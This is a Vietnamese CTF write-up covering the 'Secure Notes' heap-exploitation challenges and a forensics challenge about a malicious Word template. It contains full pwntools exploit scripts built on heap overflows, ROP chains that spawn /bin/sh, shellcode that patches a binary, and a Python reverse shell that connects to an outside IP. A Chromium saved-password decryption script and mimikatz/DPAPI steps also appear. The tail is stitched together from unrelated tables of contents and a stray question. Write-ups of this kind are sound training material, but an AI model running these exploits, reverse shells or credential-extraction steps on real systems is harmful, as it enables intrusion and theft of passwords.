    if(!p_note->note_is_encrypt){
        memcpy(p_note->note_content, serialize_p->content, serialize_p->note_content_len);
        read_count += new_note->note_content_len;
    }

    if(p_note->note_is_encrypt) {
        p_note->note_synced = 1;
        if(p_note->note_content){
            free(p_note->note_content);
            p_note->note_content = NULL;
        }
    }

Nếu như tìm thấy note trên interface thì mặc nhiên nó sẽ memcpy nội dung từ backend vào content của interface mà sẽ không check bound. Vậy thì nếu như note trên interface có content size khác với trên backend thì ta sẽ có BOF
Đầu tiên để đẩy note lên backend thì mình dùng note_sync(1) như vậy thì mỗi note chương trình sẽ đánh dấu cur_note->note_synced = 1;
Khi mà edit_note để thay đổi size của content thì nó sẽ không quan tâm đến flag đó mà chỉ quan tâm đến flag is_encrypt nếu không có thì sẽ chỉ đổi content trên interface mà không commit tới backend. Như vậy là ta có heap overflow
Khai Thác
Đầu tiên mình tạo 1 note với size lớn, sau đó dùng sync_note(1) để commit tới backend sau đó thay đổi content note đó thành size bé hơn rồi tạo thêm 1 note mới để heap overflow sẽ overwrite note mới đó
payload = b'A'*0x10
payload += p64(0) + p64(0x91)
payload += p64(0x62) + p64(0)*7
payload += p64(0x62) + p64(0)*3
payload += p64(0x10) + p64(0) + p64(libc.symbols['environ']) + p64(heap + 0x370)
payload += p64(0) + p64(0x21)
payload += p64(libc.address + 0x21ace0)*2
payload += p64(0) + p64(0x91)
payload += p64(0x61) + p64(0)*7
payload += p64(0x61) + p64(0)*3
payload += p64(0x200) + p64(0)*4 + p64(0xf1)
payload += p64(libc.address + 0x21ace0)*2
payload = payload.ljust(0x200, b'\x00')
new_note(b'a', b'a', 0x200, payload)
note_sync('c')
edit_note(b'a', b'a', 1, b'a')
new_note(b'b', b'b', 1, b'hehe')

Để trigger bug
note_sync('s')

Chạy đến memcpy

Copy 0x200 bytes

Ta thấy chunk 0x55969bf77610 chỉ có size 0x20 và phía trên là note thứ 2 mà mình tạo. Craft payload để ghi đè note đó. Thay đổi content thành environ để leak stack
payload = b'A'*0x10
payload += p64(0) + p64(0x91)
payload += p64(0x62) + p64(0)*7
payload += p64(0x62) + p64(0)*3
payload += p64(0x10) + p64(0) + p64(libc.symbols['environ']) + p64(heap + 0x370)
payload += p64(0) + p64(0x21)
payload += p64(libc.address + 0x21ace0)*2
payload += p64(0) + p64(0x91)
payload += p64(0x61) + p64(0)*7
payload += p64(0x61) + p64(0)*3
payload += p64(0x200) + p64(0)*4 + p64(0xf1)
payload += p64(libc.address + 0x21ace0)*2
payload = payload.ljust(0x200, b'\x00')

Sau khi memcpy

Như vậy là ta đã có stack
Tiếp theo mình sẽ lại khai thác lỗi này để tạo ropchain
Lại tạo 1 note có content lớn và 1 note khác để commit tới backend, lần này sẽ trigger 2 lần memcpy. Lần đầu tiên sẽ dùng memcpy để overwrite 1 note như vừa rồi, memcpy thứ 2 sẽ dùng để tạo ropchain
Lần memcpy đầu tiên

Overwrite content của note tiếp theo thành saved rip của note_sync


Lần memcpy thứ 2

Cuối cùng ta có ropchain


Script:
from pwn import *
import psutil

sla = lambda delim, data: p.sendlineafter(delim, data)
sa = lambda delim, data: p.sendafter(delim, data)


interface = context.binary = ELF('interface')
libc = ELF('libc.so.6')


def pidof(name):
    pid = 0
    for proc in psutil.process_iter():
        if name == proc.name():
            pid = proc.pid
            break
    return pid

def choice(i):
    sla(b'Choice: ', str(i).encode())
def new_note(title, author, content_len, content, encrypt = None):
    choice(1)
    sla(b'Title', title)
    sla(b'Author', author)
    if encrypt != None:
        sla(b'notes?', b'y')
        sla(b'passwd? ', encrypt)
    else:
        sla(b'notes?', b'n')
    sla(b'content?', str(content_len).encode())
    sa(b'Content: ', content)
    p.sendline(b'')
def list_note():
    choice(2)
def read_note(title, author, encrypt = None):
    choice(3)
    sla(b'Title', title)
    sla(b'Author', author)
    if encrypt != None:
        sla(b'Password', encrypt)
def edit_note(title, author, content_len, content, encrypt = None):
    choice(4)
    sla(b'Title', title)
    sla(b'Author', author)
    if encrypt != None:
        sla(b'Password', encrypt)
    sla(b'len', str(content_len).encode())
    sla(b'content', content)
def delete_note(title, author, encrypt = None):
    choice(5)
    sla(b'Title', title)
    sla(b'Author', author)
    if encrypt != None:
        sla(b'password', encrypt)
def note_sync(s_c):
    choice(6)
    if s_c == 'c':
        sla(b'note? ', b'c')
    else:
        sla(b'note? ', b's')




def GDB(proc):
    gdb.attach(proc, gdbscript='''
               #b delete_note
               b *(note_sync + 547)
               #b *(add_new_note + 316)
               #b edit_note
               c''')
def GDB_backend(proc):
    gdb.attach(proc, gdbscript='''
               #b NoteBackend_init
               c''')
def GDB_All():
    GDB(p)
    #GDB_backend(pidof('backend'))

# = remote('0', 31339)
#p = remote('139.162.29.93', 31339)    
p = process(['./interface', './backend'])
#print('pidof: ', pidof('backend'))
new_note(b'a', b'a', 1, b'a')
#p.sendline(b'')

#leak heap
edit_note(b'a', b'a', 1, b'a')
list_note()
p.recvuntil(b'Content: ')
leak = p.recvline()[:-1]
leak = int.from_bytes(leak, byteorder='little')
print('leak: ', hex(leak))
heap = leak << 4*3
print('heap: ', hex(heap))

#leak libc
edit_note(b'a', b'a', 0x500, b'a')
new_note(b'b', b'b', 1, b'b')
#p.sendline(b'')
edit_note(b'a', b'a', 1, b'a')
list_note()
p.recvuntil(b'Content: ')
leak = p.recvline()[:-1]
leak = int.from_bytes(leak, byteorder='little')
print('leak: ', hex(leak))
libc.address = leak - 0x21b110
print('libc: ', hex(libc.address))

delete_note(b'a', b'a')
delete_note(b'b', b'b')


payload = b'A'*0x10
payload += p64(0) + p64(0x91)
payload += p64(0x62) + p64(0)*7
payload += p64(0x62) + p64(0)*3
payload += p64(0x10) + p64(0) + p64(libc.symbols['environ']) + p64(heap + 0x370)
payload += p64(0) + p64(0x21)
payload += p64(libc.address + 0x21ace0)*2
payload += p64(0) + p64(0x91)
payload += p64(0x61) + p64(0)*7
payload += p64(0x61) + p64(0)*3
payload += p64(0x200) + p64(0)*4 + p64(0xf1)
payload += p64(libc.address + 0x21ace0)*2
payload = payload.ljust(0x200, b'\x00')
new_note(b'a', b'a', 0x200, payload)
note_sync('c')
edit_note(b'a', b'a', 1, b'a')
new_note(b'b', b'b', 1, b'hehe')

note_sync('s')
list_note()
p.recvuntil(b'Author: b\n')
p.recvuntil(b'Content: ')
leak = p.recvline()[:-1]
leak = int.from_bytes(leak, byteorder='little')
print('leak: ', hex(leak))
stack = leak
print('stack: ', hex(stack))
#new_note(b'a', b'a', 1, b'a')
#delete_note(b'a', b'a')

#

payload = b'\x00'*0x200
payload += p64(0) + p64(0x21) + b'A'*0x10 + p64(0) + p64(0x91)
payload += p64(0x62) + p64(0)*7 + p64(0x62) + p64(0)*3 + p64(0x10) + p64(0)
payload += p64(stack)
payload += p64(heap + 0x630) + p64(0) + p64(0x21)
payload += p64(libc.address + 0x21ace0)*2
payload += p64(0) + p64(0x91)
payload += p64(0x61) + p64(0)*7
payload += p64(0x61) + p64(0)*3
payload += p64(0x200) + p64(0) + p64(heap + 0x400)  + p64(heap + 0x770)*2 + p64(0x91)
payload += p64(0x62) + p64(0)*7
payload += p64(0x62) + p64(0)*3
payload += p64(0x50) + p64(0x2)
payload += p64(stack - 0x338) + p64(heap + 0x6e0) + p64(0) + p64(0x61)
payload += p64(0xdeadbeef)
print('len: ', hex(len(payload)))

payload2 = b'hihi'
RET = 0x00000000000baaf9 + libc.address#: xor rax, rax ; ret

rop = ROP(libc)
rop.raw(RET)
rop.system(next(libc.search(b'/bin/sh\x00')))
payload2 = rop.chain()
delete_note(b'a', b'a')
delete_note(b'b', b'b')
new_note(b'a', b'a', 0x400, payload)
new_note(b'b', b'b', 0x50, payload2)
note_sync('c')
edit_note(b'a', b'a', 0x200, b'a')
GDB_All()
note_sync('s')

p.interactive()

pwn03-flag2: Secure Notes
credit: Naox13
Để lấy dcflag2thì chúng ta phải dùngbackendđể đọc flag nên ở đây mình sẽ khai thácbackend
Có1bug ở trênbackendkhi tạo1note với flagis_encryptvới content ko quá bé thì sau khibackendencrypt thì chunk chứa cipher text sẽ bị overwrite size của chunk trước đó. Mình không khai thác được lỗi này
Tiếp đến ởoptionFETCHkhi fetch all tứcnote_sync('s')trêninterface
DL_FOREACH_SAFE(cur_note, tmp1, etmp)
{
    tmp_size = sizeof(struct NoteSerialize);
    if (!tmp1->note_is_encrypt)
    {
        tmp_size += tmp1->note_content_len;
    }
    if (reply_size + tmp_size > SHM_MEM_MAX_SIZE)
    {
        DBG("[backend] reply_size(%d) is larger than SHM_MEM_MAX_SIZE, enable truncated mode\n", reply_size + tmp_size);
        truncated = 1;
        tmp_note2 = tmp1;
        break;
    }
    reply_size += tmp_size;
}

Khi màreply_size + tmp_size > SHM_MEM_MAX_SIZE(0x10000)thì chương trình sẽ dừng và không tăngreply_msgnhưng khi tạomsggửi chointerfacethì duyệt không xót note nào. Vậy chẳng hạn ta có2note vớicontent_lenlà0x400và0xfff0nó sẽ xét tới note2cộng thêm0xfff0vào thì sẽ không tăngreply_sizenữa nênreply_sizeở đây vẫn sẽ tầm0x4..(cộng thêmsizeof(struct NoteCommon)) nên ở đây ta lại cóheap overflow
DL_FOREACH_SAFE(cur_note, tmp1, etmp)
{
    serialize_p = (NoteSerialize_t)((size_t)reply_msg->msg_content + written_count);

    memcpy(&(serialize_p->common), &(tmp1->common), sizeof(struct NoteCommon));
    written_count += sizeof(struct NoteSerialize);
    DBG("[backend] FETCH: serialize note %s(%s)\n", serialize_p->note_title, serialize_p->note_author);
    if (!tmp1->note_is_encrypt)
    {
        written_count += tmp1->note_content_len;
        memcpy(serialize_p->content, tmp1->note_content, tmp1->note_content_len);
    }
}

Ởinterfaceban đầu ta không thể tạocontentchunk quá lớn
printf("How many bytes for content? ");
content_len = read_int();
if(content_len > MAX_CONTENT_LEN){
    content_len = MAX_CONTENT_LEN;
}

MAX_CONTENT_LENở đây là0x1000nên ta có cách giải quyết là dựa trên việc ropchain ở phần trước mìnhmprotectinterfaceđể sửa lại cách hoạt động của hàm cho cái check size đó trở lên rất lớn
Vậy thì giờ việc còn lại là xây dựng heap trênbackendsao cho bugheap overflowvừa hay chỉ overwrite1byte của fieldcontentcủa1note và hạn chế phá heap
Payload của mình nối tiếp ởflag1
delete_note(b'a', b'a')
delete_note(b'b', b'b')

payload = p64(0x61) + p64(0)*7
payload += p64(0x61) + p64(0)*3
payload += p64(0x390) + p64(0)*8
new_note(b'a', b'a', 0xf910, b'a')
note_sync('c')
new_note(b'nao', b'nao', 0x600, b'nao')
note_sync('c')
new_note(b'b', b'b', 0xfff0, b'b')
note_sync('c')
payload = p32(0) + p64(0x100) + p64(0)*5 + b'\x00'
new_note(b'c'*0x8 + p64(0xb1), b'c'*0x18, 53, payload)
note_sync('c')
delete_note(b'b', b'b')


Ban đầu:

Sau đó:

Như vậy là ta có thể đưa heap kia vàocontentcủa1note trêninterfacenhưng vìNULLbyte nên mình ko thể dùngoptionList Noteđể đọc
Dựa vào ropchain ban đầu mình sửa luôn hàmRead_notethành arbitrary read luôn
new_read_note = 'sub rsp, 0x80\n'
new_read_note += shellcraft.read(0, interface.symbols['notes'] + 8, 8)
new_read_note += '\n mov rsi, [rsi]\n'
new_read_note += shellcraft.write(1, 'rsi', 0x100)
new_read_note += '\nadd rsp, 0x80'
new_read_note += '  \nret'

Patch lạiinterface
rop_elf.raw(interface.symbols['note_main'] + 122)
rop_libc.mprotect(interface.address + 0x2000, 0x3000, 7)
rop_libc.rsi = interface.symbols['edit_note'] + 525
rop_libc.rdi = 0x0fc5390001ffffb8
rop_libc.raw(MOV_PRSI_RDI)
rop_libc.rsi = interface.symbols['add_new_note'] + 621
rop_libc.rdi = 0xc439410001ffffb8
rop_libc.raw(MOV_PRSI_RDI)
rop_libc.rsi = interface.symbols['add_new_note'] + 254
rop_libc.rdi = 0x0fd0390001ffffba
rop_libc.raw(MOV_PRSI_RDI)
rop_libc.read(0, interface.symbols['read_note'], 0x200)
rop_libc.raw(RET)

payload += rop_libc.chain() + rop_elf.chain()

Đoạn tiếp sau đây của mình chỉ hoạt động trên local còn khi chạy trên server thì sau khi leak được heap củabackendthì hình nhưbackendcrash nên không thể kết nối được nữa
Tiếp theo dựa vàoheap overflowthì mình overwrite được tcache cho trỏ về1note hiện tại để mình có thể sửacontenttùy ý mà leak. Đoạn này rất mệt vì nó phá heap với struct nhiều làm mãi mới xây dựng được1cái payload chạy được (mình đọc lại cũng chẳng hiểu gì)

Như ta thấynext_notevàcontentđều trỏ cùng1chunk nên mình thay đổicontentđể leaklibcvàstack
Sau thì mình fake tcache lần nữa nma giờ không thể làm đượcheap overflowvới cái kiểureply_msg + tmp_size > 0x10000heap giờ nát quá rồi không chạy được cái đó nữa thì ở đây do có thể control được hoàn toàn1note mình thay đổi control vì mình có thểarbitrary free1chunk bất kì. Mình chỉ cần tìm trước1cái tcache chunk nào đó có1số data mà mình kiểm soát từ trước đó rồi craft fake chunk


Lúc đầu cáiaa...kia là1cái string khác mà mình biết ngay là tên của1note mình tạo nên mình biết là mình control được rồi mình set0x151ở kia thôi
new_note(b'a'*8 + p32(0x151), b'fake', 0xc0, fake_chunk)

freerồimallocchunk vừa rồi để overwrite tcache thànhsaved rip - 0x10củamemcpyrồi tạo reverse shell do mình không thể interact trực tiếp vớibackend
PYTHON3 = env_back - 0x298 - 8 - 0x10 + 0xa0
C = PYTHON3 + 1 + len('/bin/python3')
REVERSE_ADDR = C + 1 + len('-c')
REVERSE = b'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("193.161.193.99",26863));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
back_rop = ROP(libc_back)
flag = b'/home/nao/flag\x00r\x00'.ljust(0x18, b'\x00')
back_rop.raw(0)
back_rop.raw(0)
back_rop.raw(0)
back_rop.execve(PYTHON3, PYTHON3 - 0x40, 0)
payload = back_rop.chain()

payload = payload.ljust(0xa0 - 0x40, b'\x00')
payload += p64(PYTHON3)
payload += p64(C)
payload += p64(REVERSE_ADDR)
payload += p64(0)*5
payload += b'/bin/python3\x00' + b'-c\x00' + REVERSE + b'\x00'



Tiếc là trên server chạy ko ăn:((
Chạy được trên server sau 10 phút đợi script:

MISCELLANEOUS
Misc / Forensics - TET & 4N6
credit: Nex0

Chall:https://mega.nz/file/U20TCS7Z#dXWlXyL4MKVx5J5RahJRpC3uB_oUJrH1IlPdRhmrNvA*
Vì author ra đề troll, chưa check nên tồn tại nhiều unintended solution, ở đây mình sẽ làm theo hướng mà mình nghĩ là intended 🐧*
1. Find the malicious code and tell me the IP and Port C2
Đầu tiên, ta load fileBackup.ad1vàoFTK Imager.
Vì description có nói tới việc đọc rules xong thì máy bị infected. Đầu tiên mình check trongRecentfolder:

Ta thấy file lnk tới 1 file Rules, lướt binary xuống xem ta sẽ có file path nó trỏ đến:

Mình sẽ dump file docx này ra từ memdump mà đề bài đã cho bằngVolatility3:

Và vì là Docx, mình tiếp tục checkRecentfolder của Office:

Như ta thấy, recent opened file có file Rule, ngoài ra nó load cả Template của file docx lên. Tuy nhiên khi mình check trên file docx thì không có dấu hiệu nào là malicious template cả 💀. Vì thế mình tiếp tục check trongTemplate:

Template có enable macro (dotm), khá khả nghi. Mình extract fileNormal.dotmvà kiểm tra macro của nó bằngolevba:

Sau khi đọc qua code, ta tạm hiểu được là nó khởi tạo socket, connect tới c2 server, gọi reverseshell bằng createproc cmd.
Và tại code, ta có luôn IP và Port của C2 Server:

2. What was the first flag you found?
Tại đây, dưới cùng của code, ta thấy có 1 comment được encode base64:

Sau khi decode 5 lần ra thì ta có part1 của flag:

3. After registering an account, I no longer remember anything about my account. Can you help me find and get the second flag?
:v Tác giả chưa check đề nên History vẫn chứa info về flag này, nhưng mình sẽ làm theo 2 cách khác:

Cách 1: Dựa vào bài viếtnày. Đầu tiên mình extract fileLogin Datara và view bằng tool xem sql online. Ta thấy được 1 account pastebin được lưu pass có user name làtecij23311
  
  Sau đó mình dump proc của chrome ra, sau đó dùng combo tối thượngstringgreptương tự cách họ demo trong đó:
  
  Ta có được password làtecij23311Pass. Login pastebin bằng tài khoản đó và ta có được part2.

Cách 2: Painful, nhưng nghe chắc chắn hơn. Mình sử dụng công cụMemprocFS. Ở đây mình load thêm pluginpym_regscretsvào tool:
  
  Sau đó load mem vào:
  
  Check kết quả parse được từ plugin chúng ta thêm vào, mình lấy được windows default password:
  
  Sau khi có lsa pass, mình sử dụngmimikatzđể lấy masterkey:
  
  Tiếp theo, tại fileLocal State, ta lấy trườngencrypted_keyra decode base64 và xóa phầnDPAPIở đầu file đi:
  
  Đây là key dùng để encrypt password ở fileLogin Data, nó đã được mã hóa bởi masterkey. Ở trên ta đã có được masterkey, mình dùngmimikatzcùng masterkey này để decrypt ra aes key cần tìm:
  
  Ta có được aeskey là:aa b6 83 b4 8a f4 52 76 f7 44 48 5a 2c 95 ba 15 2f c3 ae 2a ff 00 5b 1d d7 ba 19 b1 e2 f0 77 29
  Cuối cùng mình sử dụng script sau để decrypt password trongLogin Data:
  # Decrypt Chromium Passwords
  import argparse
  import base64
  import os
  import re
  import shutil
  import sqlite3
  import sys
  from Cryptodome.Cipher import AES

  def decrypt_payload(cipher, payload):
      return cipher.decrypt(payload)

  def generate_cipher(aes_key, iv):
      return AES.new(aes_key, AES.MODE_GCM, iv)

  def decrypt_password(ciphertext, secret_key):
      try:
          initialisation_vector = ciphertext[3:15]
          encrypted_password = ciphertext[15:-16]
          cipher = generate_cipher(secret_key, initialisation_vector)
          decrypted_pass = decrypt_payload(cipher, encrypted_password)
          decrypted_pass = decrypted_pass.decode()  
          return decrypted_pass
      except Exception as e:
          print("%s"%str(e))
          print("[ERR] Unable to decrypt, Chrome version <80 not supported. Please check.")
          return ""

  def get_db_connection(chromium_path_login_db):
      try:
          shutil.copy2(chromium_path_login_db, "Loginvault.db") 
          return sqlite3.connect("Loginvault.db")
      except Exception as e:
          print("%s"%str(e))
          print("[ERR] Chrome database cannot be found")
          return None

  # Main Function
  def main():
      chromium_path = os.path.normpath('Login Data')
      secret_key = bytes.fromhex('aab683b48af45276f744485a2c95ba152fc3ae2aff005b1dd7ba19b1e2f07729')

      try:
          chromium_path_login_db = chromium_path
          conn = get_db_connection(chromium_path_login_db)
          if(secret_key and conn):
              cursor = conn.cursor()
              cursor.execute("SELECT origin_url, username_value, password_value FROM logins")
              for index,login in enumerate(cursor.fetchall()):
                  url = login[0]
                  username = login[1]
                  ciphertext = login[2]
                  decrypted_password = decrypt_password(ciphertext, secret_key)
                  if (decrypted_password != ""):
                      print("Sequence: %d"%(index))
                      print("URL: %s\nUser Name: %s\nPassword: %s\n"%(url,username,decrypted_password))
                      print("*"*50)
              # Close database connection
              cursor.close()
              conn.close()
              # Delete temp login db
              os.remove("Loginvault.db")
      except Exception as e:
          print("[ERR] %s"%str(e))

  if __name__ == '__main__':
      main()

  Và ta có được password:
  
  Tiếp tới là login như cách 1 và lấy part 2 thôi.
  
  Flag:TetCTF{172.20.25.15:4444_VBA-M4cR0_R3c0v3rry_34sy_R1ght?}


Lời kết
Cảm ơn mọi người đã đọc đến đây, cũng xin cảm ơn những nỗ lực không biết mệt mỏi của các anh chị em trong CLB, năm 2024 bọn mình sẽ cố gắng đóng góp nhiều hơn nữa cho cộng đồng ATTT của Việt Nam nói chung và của sinh viên nói riêng.
Bonus thêm những quả ảnh nhộn nhịp khi làm bài hehe 😆

Số	Biểu diễn nhị phân	Biểu diễn đa thức
0	000	0x^2 + 0x^1 + 0x^0 = 0
1	001	0x^2 + 0x^1 + 1x^0 = 1
2	010	0x^2 + 1x^1 + 0x^0 = x
3	011	0x^2 + 1x^1 + 1x^0 = x + 1
4	100	1x^2 + 0x^1 + 0x^0 = x^2
5	101	1x^2 + 0x^1 + 1x^0 = x^2 + 1
6	110	1x^2 + 1x^1 + 0x^0 = x^2 + x
7	111	1x^2 + 1x^1 + 1x^0 = x^2 + x + 1

KCSC's things

Write Up Tuyển Thành Viên KCSC 2025

I. Web

Check member

Login system

write_by_chatgpt

yugioh_shop

final mission

todo

Break

giftcard

XXD Service

II. Forensics

HDSD

Invitation

Powershell 101

Automatic

DFIR 01

DFIR 02

DFIR 03

DFIR 04

DFIR 05

III. Pwn

AAA

welcome

darktunnel

ccrash

Chodan

babyROP

LapTrinhCanBan

KCSC Shop

qwer

IV. Reverse

HIDDEN

easyre

Spy Room

EzRev

Reverse me

ChaChaCha

WaiterFall

V. Crypto

Crypto 1 (easy)

VlCG (easy)

Zoltraak (easy)

AESOS (easy/medium)

vem (medium)

Simple lath (medium)

Icecream but easier (easy/medium)

Crypto 2 (hard)

HTB Business CTF 2024: The Vault Of Hope Write Up

Web

Jailbreak

Solution

Flag

HTB Proxy

Command Injection in ip-wrapper

SSRF to get content

Flag

Skills Learned

Blueprint Heist

Reconnaissance + detect

RCE

Exploit wkhtmltopdf SSRF

SSTI in ejs template via sqli

Exploit chain

Flag

Magicom

Preface

Phân Tích Source Code

Config

Source Code

Khai thác

Command Injection in cli.php

Race Condition??

The right path: Phar Deserialization

Final Exploit

SOS or SSO?

Tổng quan

Lỗ hổng

Khai thác

What's the hash of the root account's password, enter the whole line (ex: `root:$2$JgiaOAai....`)?